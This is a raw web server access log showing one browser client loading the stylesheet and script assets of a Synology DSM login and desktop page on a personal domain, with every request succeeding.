[Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/style.css?v=1661421011" [Client 54.224.93.144] [Length 6016] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/css/desktop.css?v=1661421011" [Client 54.224.93.144] [Length 11272] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ExternalDevices/style.css?v=1661421011" [Client 54.224.93.144] [Length 1004] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/SupportForm/style.css?v=1661757678" [Client 54.224.93.144] [Length 494] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/C3/style.css?v=1661421011" [Client 54.224.93.144] [Length 780] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DataDrivenDocuments/style.css?v=1661421011" [Client 54.224.93.144] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ActiveInsightUpdateNotify/style.css?v=1661421011" [Client 54.224.93.144] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/HotkeyManager/style.css?v=1661421011" [Client 54.224.93.144] [Length 1136] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/PollingTask/style.css?v=1661757678" [Client 54.224.93.144] [Length 609] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/LogCenter/style.css?v=1657013615" [Client 54.224.93.144] [Length 2048] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DiskMessageHandler/style.css?v=1661421011" [Client 54.224.93.144] [Length 575] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/PersonalSettings/style.css?v=1661757678" [Client 54.224.93.144] [Length 4474] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/SystemInfoApp/style.css?v=1661421011" [Client 54.224.93.144] [Length 2735] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/SecurityScan/style.css?v=1652943644" [Client 54.224.93.144] [Length 4601] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/EnableNewUpdateSetting/style.css?v=1661421011" [Client 54.224.93.144] [Length 983] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/VideoPlayer2/style.css?v=1649656611" [Client 54.224.93.144] [Length 1998] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/PkgManApp/style.css?v=1661757678" [Client 54.224.93.144] [Length 5292] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/StorageManager/style.css?v=1661421011" [Client 54.224.93.144] [Length 28078] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/SharingManager/style.css?v=1661757678" [Client 54.224.93.144] [Length 229] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DesktopProgress/style.css?v=1661757678" [Client 54.224.93.144] [Length 860] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ClipBoardJS/style.css?v=1661757678" [Client 54.224.93.144] [Length 387] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/PhotoViewer/style.css?v=1661757678" [Client 54.224.93.144] [Length 3361] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/FileChooserV6/style.css?v=1661757678" [Client 54.224.93.144] [Length 1098] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ResourceMonitor/style.css?v=1661421011" [Client 54.224.93.144] [Length 6761] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/MyDSCenter/style.css?v=1661757678" [Client 54.224.93.144] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/TaskSchedulerUtils/style.css?v=1661757678" [Client 54.224.93.144] [Length 104] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/OTPWizard/style.css?v=1661757678" [Client 54.224.93.144] [Length 870] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/UpdateMaskApp/style.css?v=1661421011" [Client 54.224.93.144] [Length 481] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/Widgets/style.css?v=1661421011" [Client 54.224.93.144] [Length 3239] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/AudioPlayer/style.css?v=1661757678" [Client 54.224.93.144] [Length 3921] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/BackgroundTaskMonitor/style.css?v=1661757678" [Client 54.224.93.144] [Length 1934] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/WelcomeApp/style.css?v=1661421011" [Client 54.224.93.144] [Length 10609] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/AdminCenter/style.css?v=1661226912" [Client 54.224.93.144] [Length 15876] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DSMNotify/style.css?v=1661757678" [Client 54.224.93.144] [Length 2159] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/HelpBrowser/style.css?v=1661757678" [Client 54.224.93.144] [Length 5614] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DisableAdminNotification/style.css?v=1661421011" [Client 54.224.93.144] [Length 440] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/Utils/style.css?v=1661757678" [Client 54.224.93.144] [Length 2311] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/TaskSchedulerWidget/style.css?v=1661421011" [Client 54.224.93.144] [Length 989] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ConfigBackup/style.css?v=1660704937" [Client 54.224.93.144] [Length 1239] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/TinyMCE/style.css?v=1635321605" [Client 54.224.93.144] [Length 4624] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/FileChooser/style.css?v=1661757678" [Client 54.224.93.144] [Length 943] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ResetAdminApp/style.css?v=1661421011" [Client 54.224.93.144] [Length 514] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/Share/style.css?v=1661757678" [Client 54.224.93.144] [Length 1433] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/BandwidthControl/style.css?v=1634102886" [Client 54.224.93.144] [Length 72] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/ScsiTarget/style.css?v=1659958512" [Client 54.224.93.144] [Length 7620] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/OAuthService/style.css?v=1618330426" [Client 54.224.93.144] [Length 345] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/FileBrowser/style.css?v=1657097204" [Client 54.224.93.144] [Length 12126] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/WebStation/style.css?v=1648710000" [Client 54.224.93.144] [Length 4262] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyPhotos/style.css?v=1733908506" [Client 54.224.93.144] [Length 56578] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/CloudSync/style.css?v=1744186293" [Client 54.224.93.144] [Length 8535] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/FileTaskMonitor/style.css?v=1657097197" [Client 54.224.93.144] [Length 644] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/AudioStation/style.css?v=1670317322" [Client 54.224.93.144] [Length 17366] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/CodecPack/style.css?v=1662540402" [Client 54.224.93.144] [Length 673] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/LogCenter/style.css?v=1657880510" [Client 54.224.93.144] [Length 580] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynoFinder/style.css?v=1670389783" [Client 54.224.93.144] [Length 22699] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/VPNCenter/style.css?v=1656648365" [Client 54.224.93.144] [Length 1201] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/DirectoryServer/style.css?v=1657077274" [Client 54.224.93.144] [Length 1980] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/DownloadStation/style.css?v=1714372160" [Client 54.224.93.144] [Length 5968] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/HybridShare/style.css?v=1761112552" [Client 54.224.93.144] [Length 1165] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyDrive-ShareSync/style.css?v=1731304858" [Client 54.224.93.144] [Length 3834] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyApplicationService/style.css?v=1675505560" [Client 54.224.93.144] [Length 2208] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/MediaServer/style.css?v=1733153684" [Client 54.224.93.144] [Length 877] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/HyperBackup/style.css?v=1666887595" [Client 54.224.93.144] [Length 20594] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/AntiVirus/style.css?v=1676872996" [Client 54.224.93.144] [Length 5551] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyDrive/style.css?v=1731304862" [Client 54.224.93.144] [Length 13476] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/DhcpServer/style.css?v=1639559986" [Client 54.224.93.144] [Length 2046] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/ActiveInsight/style.css?v=1706865053" [Client 54.224.93.144] [Length 797] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyDrive-Drive/style.css?v=1731304858" [Client 54.224.93.144] [Length 75280] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/WebDAVServer/style.css?v=1767609886" [Client 54.224.93.144] [Length 294] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/scripts/babel-polyfill/polyfill.js?v=1650348555" [Client 54.224.93.144] [Length 47694] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs&SynoToken=&v=1656670912" [Client 54.224.93.144] [Length 725] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/scripts/synowebapi.js/synowebapi.min.js?v=1653287912" [Client 54.224.93.144] [Length 12470] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/scripts/synocredential.js/synocredential.min.js?v=1661507553" [Client 54.224.93.144] [Length 5114] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/VideoStation/style.css?v=1711016943" [Client 54.224.93.144] [Length 102713] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webapi/entry.cgi?api=SYNO.Core.Desktop.Defs&version=1&method=getjs&v=1745258201" [Client 54.224.93.144] [Length 196] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webman/unsupported-browsers/dist/bundle.js?v=1661421011" [Client 54.224.93.144] [Length 889] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/webapi/entry.cgi?api=SYNO.Core.Desktop.JSUIString&version=1&method=getjs&lang=hun&v=1665685189" [Client 54.224.93.144] [Length 4648] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:25 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3/adapter/ext/ext-base.js?v=1650348555" [Client 54.224.93.144] [Length 12041] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:26 +0000] - 200 200 - GET https profibot.synology.me "/scripts/scrollbar/flexcroll.js?v=1650348555" [Client 54.224.93.144] [Length 8293] [Gzip -] [Sent-to 192.168.100.30] 